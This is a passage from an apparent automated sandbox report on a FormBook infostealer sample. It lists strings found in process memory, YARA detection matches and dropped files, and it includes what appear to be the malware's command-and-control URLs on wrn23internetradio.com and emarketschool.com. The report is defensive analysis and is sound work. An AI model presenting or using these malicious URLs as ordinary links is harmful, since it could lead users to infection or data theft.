          Source: cmd.exe, 00000006.00000002.1547088854.0000000003C39000.00000004.00000001.sdmpString found in binary or memory: http://www.emarketschool.com/m5gz/
          Source: explorer.exe, 00000002.00000000.1310136384.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://www.etmall.com.tw/
          Source: explorer.exe, 00000002.00000000.1310136384.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://www.etmall.com.tw/favicon.ico
          Source: explorer.exe, 00000002.00000000.1310136384.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://www.excite.co.jp/
          Source: explorer.exe, 00000002.00000000.1310136384.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://www.expedia.com/
          Source: explorer.exe, 00000002.00000000.1310136384.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://www.expedia.com/favicon.ico
          Source: explorer.exe, 00000002.00000000.1306201883.0000000011076000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com
          Source: explorer.exe, 00000002.00000000.1306201883.0000000011076000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers
          Source: explorer.exe, 00000002.00000000.1306201883.0000000011076000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
          Source: explorer.exe, 00000002.00000000.1306201883.0000000011076000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
          Source: explorer.exe, 00000002.00000000.1306201883.0000000011076000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
          Source: explorer.exe, 00000002.00000000.1306201883.0000000011076000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
          Source: explorer.exe, 00000002.00000000.1306201883.0000000011076000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
          Source: explorer.exe, 00000002.00000000.1306201883.0000000011076000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
          Source: explorer.exe, 00000002.00000000.1306201883.0000000011076000.00000002.00000001.sdmpString found in binary or memory: http://www.fonts.com
          Source: explorer.exe, 00000002.00000000.1306201883.0000000011076000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn
          Source: explorer.exe, 00000002.00000000.1306201883.0000000011076000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
          Source: explorer.exe, 00000002.00000000.1306201883.0000000011076000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
          Source: explorer.exe, 00000002.00000000.1306201883.0000000011076000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
          Source: explorer.exe, 00000002.00000000.1306201883.0000000011076000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
          Source: explorer.exe, 00000002.00000000.1310136384.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://www.gismeteo.ru/favicon.ico
          Source: explorer.exe, 00000002.00000000.1310136384.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://www.gmarket.co.kr/
          Source: explorer.exe, 00000002.00000000.1310136384.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://www.gmarket.co.kr/favicon.ico
          Source: explorer.exe, 00000002.00000000.1306201883.0000000011076000.00000002.00000001.sdmpString found in binary or memory: http://www.goodfont.co.kr
          Source: explorer.exe, 00000002.00000000.1310136384.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://www.google.co.in/
          Source: explorer.exe, 00000002.00000000.1310136384.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://www.google.co.jp/
          Source: explorer.exe, 00000002.00000000.1310136384.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://www.google.co.uk/
          Source: explorer.exe, 00000002.00000000.1310136384.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://www.google.com.br/
          Source: explorer.exe, 00000002.00000000.1310136384.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://www.google.com.sa/
          Source: explorer.exe, 00000002.00000000.1310136384.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://www.google.com.tw/
          Source: explorer.exe, 00000002.00000000.1310136384.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://www.google.com/
          Source: explorer.exe, 00000002.00000000.1310136384.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://www.google.com/favicon.ico
          Source: explorer.exe, 00000002.00000000.1310136384.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://www.google.cz/
          Source: explorer.exe, 00000002.00000000.1310136384.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://www.google.de/
          Source: explorer.exe, 00000002.00000000.1310136384.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://www.google.es/
          Source: explorer.exe, 00000002.00000000.1310136384.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://www.google.fr/
          Source: explorer.exe, 00000002.00000000.1310136384.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://www.google.it/
          Source: explorer.exe, 00000002.00000000.1310136384.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://www.google.pl/
          Source: explorer.exe, 00000002.00000000.1310136384.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://www.google.ru/
          Source: explorer.exe, 00000002.00000000.1310136384.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://www.google.si/
          Source: explorer.exe, 00000002.00000000.1310136384.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://www.iask.com/
          Source: explorer.exe, 00000002.00000000.1310136384.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://www.iask.com/favicon.ico
          Source: explorer.exe, 00000002.00000000.1306201883.0000000011076000.00000002.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
          Source: explorer.exe, 00000002.00000000.1310136384.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://www.kkbox.com.tw/
          Source: explorer.exe, 00000002.00000000.1310136384.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://www.kkbox.com.tw/favicon.ico
          Source: explorer.exe, 00000002.00000000.1310136384.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://www.linternaute.com/favicon.ico
          Source: explorer.exe, 00000002.00000000.1310136384.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://www.maktoob.com/favicon.ico
          Source: explorer.exe, 00000002.00000000.1310136384.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://www.mercadolibre.com.mx/
          Source: explorer.exe, 00000002.00000000.1310136384.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://www.mercadolibre.com.mx/favicon.ico
          Source: explorer.exe, 00000002.00000000.1310136384.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://www.mercadolivre.com.br/
          Source: explorer.exe, 00000002.00000000.1310136384.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://www.mercadolivre.com.br/favicon.ico
          Source: explorer.exe, 00000002.00000000.1310136384.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://www.merlin.com.pl/
          Source: explorer.exe, 00000002.00000000.1310136384.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://www.merlin.com.pl/favicon.ico
          Source: explorer.exe, 00000002.00000000.1310136384.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://www.microsofttranslator.com/?ref=IE8Activity
          Source: explorer.exe, 00000002.00000000.1310136384.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://www.microsofttranslator.com/BV.aspx?ref=IE8Activity&amp;a=
          Source: explorer.exe, 00000002.00000000.1310136384.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://www.microsofttranslator.com/BVPrev.aspx?ref=IE8Activity
          Source: explorer.exe, 00000002.00000000.1310136384.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://www.microsofttranslator.com/Default.aspx?ref=IE8Activity
          Source: explorer.exe, 00000002.00000000.1310136384.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://www.microsofttranslator.com/DefaultPrev.aspx?ref=IE8Activity
          Source: explorer.exe, 00000002.00000000.1310136384.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://www.mtv.com/
          Source: explorer.exe, 00000002.00000000.1310136384.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://www.mtv.com/favicon.ico
          Source: explorer.exe, 00000002.00000000.1310136384.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://www.myspace.com/favicon.ico
          Source: explorer.exe, 00000002.00000000.1310136384.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://www.najdi.si/
          Source: explorer.exe, 00000002.00000000.1310136384.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://www.najdi.si/favicon.ico
          Source: explorer.exe, 00000002.00000000.1310136384.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://www.nate.com/favicon.ico
          Source: explorer.exe, 00000002.00000000.1310136384.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://www.neckermann.de/
          Source: explorer.exe, 00000002.00000000.1310136384.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://www.neckermann.de/favicon.ico
          Source: explorer.exe, 00000002.00000000.1310136384.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://www.news.com.au/favicon.ico
          Source: explorer.exe, 00000002.00000000.1310136384.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://www.nifty.com/favicon.ico
          Source: explorer.exe, 00000002.00000000.1310136384.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://www.ocn.ne.jp/favicon.ico
          Source: explorer.exe, 00000002.00000000.1310136384.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://www.orange.fr/
          Source: explorer.exe, 00000002.00000000.1310136384.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://www.otto.de/favicon.ico
          Source: explorer.exe, 00000002.00000000.1310136384.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://www.ozon.ru/
          Source: explorer.exe, 00000002.00000000.1310136384.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://www.ozon.ru/favicon.ico
          Source: explorer.exe, 00000002.00000000.1310136384.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://www.ozu.es/favicon.ico
          Source: explorer.exe, 00000002.00000000.1310136384.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://www.paginasamarillas.es/
          Source: explorer.exe, 00000002.00000000.1310136384.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://www.paginasamarillas.es/favicon.ico
          Source: explorer.exe, 00000002.00000000.1310136384.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://www.pchome.com.tw/favicon.ico
          Source: explorer.exe, 00000002.00000000.1310136384.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://www.priceminister.com/
          Source: explorer.exe, 00000002.00000000.1310136384.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://www.priceminister.com/favicon.ico
          Source: explorer.exe, 00000002.00000000.1310136384.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://www.rakuten.co.jp/favicon.ico
          Source: explorer.exe, 00000002.00000000.1310136384.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://www.rambler.ru/
          Source: explorer.exe, 00000002.00000000.1310136384.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://www.rambler.ru/favicon.ico
          Source: explorer.exe, 00000002.00000000.1310136384.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://www.recherche.aol.fr/
          Source: explorer.exe, 00000002.00000000.1310136384.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://www.rtl.de/
          Source: explorer.exe, 00000002.00000000.1310136384.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://www.rtl.de/favicon.ico
          Source: explorer.exe, 00000002.00000000.1306201883.0000000011076000.00000002.00000001.sdmpString found in binary or memory: http://www.sajatypeworks.com
          Source: explorer.exe, 00000002.00000000.1306201883.0000000011076000.00000002.00000001.sdmpString found in binary or memory: http://www.sakkal.com
          Source: explorer.exe, 00000002.00000000.1306201883.0000000011076000.00000002.00000001.sdmpString found in binary or memory: http://www.sandoll.co.kr
          Source: explorer.exe, 00000002.00000000.1310136384.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://www.servicios.clarin.com/
          Source: explorer.exe, 00000002.00000000.1310136384.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://www.shopzilla.com/
          Source: explorer.exe, 00000002.00000000.1310136384.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://www.sify.com/favicon.ico
          Source: explorer.exe, 00000002.00000000.1310136384.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://www.so-net.ne.jp/share/favicon.ico
          Source: explorer.exe, 00000002.00000000.1310136384.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://www.sogou.com/
          Source: explorer.exe, 00000002.00000000.1310136384.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://www.sogou.com/favicon.ico
          Source: explorer.exe, 00000002.00000000.1310136384.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://www.soso.com/
          Source: explorer.exe, 00000002.00000000.1310136384.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://www.soso.com/favicon.ico
          Source: explorer.exe, 00000002.00000000.1310136384.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://www.t-online.de/favicon.ico
          Source: explorer.exe, 00000002.00000000.1310136384.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://www.taobao.com/
          Source: explorer.exe, 00000002.00000000.1310136384.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://www.taobao.com/favicon.ico
          Source: explorer.exe, 00000002.00000000.1310136384.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://www.target.com/
          Source: explorer.exe, 00000002.00000000.1310136384.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://www.target.com/favicon.ico
          Source: explorer.exe, 00000002.00000000.1310136384.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://www.tchibo.de/
          Source: explorer.exe, 00000002.00000000.1310136384.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://www.tchibo.de/favicon.ico
          Source: explorer.exe, 00000002.00000000.1310136384.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://www.tesco.com/
          Source: explorer.exe, 00000002.00000000.1310136384.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://www.tesco.com/favicon.ico
          Source: explorer.exe, 00000002.00000000.1310136384.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://www.timesonline.co.uk/img/favicon.ico
          Source: explorer.exe, 00000002.00000000.1306201883.0000000011076000.00000002.00000001.sdmpString found in binary or memory: http://www.tiro.com
          Source: explorer.exe, 00000002.00000000.1310136384.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://www.tiscali.it/favicon.ico
          Source: explorer.exe, 00000002.00000000.1306201883.0000000011076000.00000002.00000001.sdmpString found in binary or memory: http://www.typography.netD
          Source: explorer.exe, 00000002.00000000.1310136384.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://www.univision.com/
          Source: explorer.exe, 00000002.00000000.1310136384.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://www.univision.com/favicon.ico
          Source: explorer.exe, 00000002.00000000.1306201883.0000000011076000.00000002.00000001.sdmpString found in binary or memory: http://www.urwpp.deDPlease
          Source: explorer.exe, 00000002.00000000.1310136384.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://www.walmart.com/
          Source: explorer.exe, 00000002.00000000.1310136384.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://www.walmart.com/favicon.ico
          Source: cmd.exe, 00000006.00000002.1547270543.0000000003F2F000.00000004.00000001.sdmpString found in binary or memory: http://www.wrn23internetradio.com/10_Best_Mutual_Funds.cfm?fp=65F8RB7i3x%2FsEwmlkD1BcfX4pXeqlmp94evK
          Source: cmd.exe, 00000006.00000002.1547270543.0000000003F2F000.00000004.00000001.sdmpString found in binary or memory: http://www.wrn23internetradio.com/Best_Penny_Stocks.cfm?fp=65F8RB7i3x%2FsEwmlkD1BcfX4pXeqlmp94evKe18
          Source: cmd.exe, 00000006.00000002.1547270543.0000000003F2F000.00000004.00000001.sdmpString found in binary or memory: http://www.wrn23internetradio.com/Credit_Card_Application.cfm?fp=65F8RB7i3x%2FsEwmlkD1BcfX4pXeqlmp94
          Source: cmd.exe, 00000006.00000002.1547270543.0000000003F2F000.00000004.00000001.sdmpString found in binary or memory: http://www.wrn23internetradio.com/Healthy_Weight_Loss.cfm?fp=65F8RB7i3x%2FsEwmlkD1BcfX4pXeqlmp94evKe
          Source: cmd.exe, 00000006.00000002.1547270543.0000000003F2F000.00000004.00000001.sdmpString found in binary or memory: http://www.wrn23internetradio.com/High_Speed_Internet.cfm?fp=65F8RB7i3x%2FsEwmlkD1BcfX4pXeqlmp94evKe
          Source: cmd.exe, 00000006.00000002.1547270543.0000000003F2F000.00000004.00000001.sdmpString found in binary or memory: http://www.wrn23internetradio.com/Parental_Control.cfm?fp=65F8RB7i3x%2FsEwmlkD1BcfX4pXeqlmp94evKe18O
          Source: cmd.exe, 00000006.00000002.1547270543.0000000003F2F000.00000004.00000001.sdmpString found in binary or memory: http://www.wrn23internetradio.com/__media__/js/trademark.php?d=wrn23internetradio.com&type=mng
          Source: cmd.exe, 00000006.00000002.1547270543.0000000003F2F000.00000004.00000001.sdmpString found in binary or memory: http://www.wrn23internetradio.com/display.cfm
          Source: cmd.exe, 00000006.00000002.1547270543.0000000003F2F000.00000004.00000001.sdmpString found in binary or memory: http://www.wrn23internetradio.com/find_a_tutor.cfm?fp=65F8RB7i3x%2FsEwmlkD1BcfX4pXeqlmp94evKe18OP4OT
          Source: cmd.exe, 00000006.00000002.1547270543.0000000003F2F000.00000004.00000001.sdmpString found in binary or memory: http://www.wrn23internetradio.com/m5gz/?_XL000=kjyTHG7M5
          Source: cmd.exe, 00000006.00000002.1547270543.0000000003F2F000.00000004.00000001.sdmpString found in binary or memory: http://www.wrn23internetradio.com/px.js?ch=1
          Source: cmd.exe, 00000006.00000002.1547270543.0000000003F2F000.00000004.00000001.sdmpString found in binary or memory: http://www.wrn23internetradio.com/px.js?ch=2
          Source: cmd.exe, 00000006.00000002.1547270543.0000000003F2F000.00000004.00000001.sdmpString found in binary or memory: http://www.wrn23internetradio.com/sk-logabpstatus.php?a=Sy9UZkRVNnM1d05sVmpSaTQwbEFrQzlrWXhWdGdtMGl1
          Source: explorer.exe, 00000002.00000000.1310136384.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://www.ya.com/favicon.ico
          Source: explorer.exe, 00000002.00000000.1310136384.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://www.yam.com/favicon.ico
          Source: explorer.exe, 00000002.00000000.1306201883.0000000011076000.00000002.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
          Source: explorer.exe, 00000002.00000000.1310136384.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://www3.fnac.com/
          Source: explorer.exe, 00000002.00000000.1310136384.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://www3.fnac.com/favicon.ico
          Source: explorer.exe, 00000002.00000000.1310136384.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://xml-us.amznxslt.com/onca/xml?Service=AWSECommerceService&amp;Version=2008-06-26&amp;Operation
          Source: explorer.exe, 00000002.00000000.1310136384.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://z.about.com/m/a08.ico
          Source: cmd.exe, 00000006.00000002.1547270543.0000000003F2F000.00000004.00000001.sdmpString found in binary or memory: https://www.networksolutions.com/cgi-bin/promo/domain-search?domainNames=wrn23internetradio.com&sear

          E-Banking Fraud:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000001.00000002.1330781052.00000000010A0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.1543213896.00000000032C0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.1539075288.0000000002BA0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000019.00000002.1537258723.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.1542910573.0000000003290000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.1330562113.0000000000C60000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.1280189026.0000000004A67000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.1330269509.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000019.00000002.1539944232.00000000013E0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000017.00000002.1540880092.00000000049B3000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 1.2.REQUERIDA.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.REQUERIDA.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 25.2.user7n7plnxh.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 25.2.user7n7plnxh.exe.400000.0.unpack, type: UNPACKEDPE

          System Summary:

          barindex
          Detected FormBook malwareShow sources
          Source: C:\Windows\SysWOW64\cmd.exeDropped file: C:\Users\user\AppData\Roaming\KP994Q-A\KP9logri.iniJump to dropped file
          Source: C:\Windows\SysWOW64\cmd.exeDropped file: C:\Users\user\AppData\Roaming\KP994Q-A\KP9logrv.iniJump to dropped file
          Malicious sample detected (through community Yara rule)Show sources
          Source: 00000001.00000002.1330781052.00000000010A0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000002.1330781052.00000000010A0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000006.00000002.1543213896.00000000032C0000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000006.00000002.1543213896.00000000032C0000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000006.00000002.1539075288.0000000002BA0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000006.00000002.1539075288.0000000002BA0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000019.00000002.1537258723.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000019.00000002.1537258723.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000006.00000002.1542910573.0000000003290000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000006.00000002.1542910573.0000000003290000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000002.1330562113.0000000000C60000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000002.1330562113.0000000000C60000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000000.00000002.1280189026.0000000004A67000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000000.00000002.1280189026.0000000004A67000.00000004.00000001.sdmp,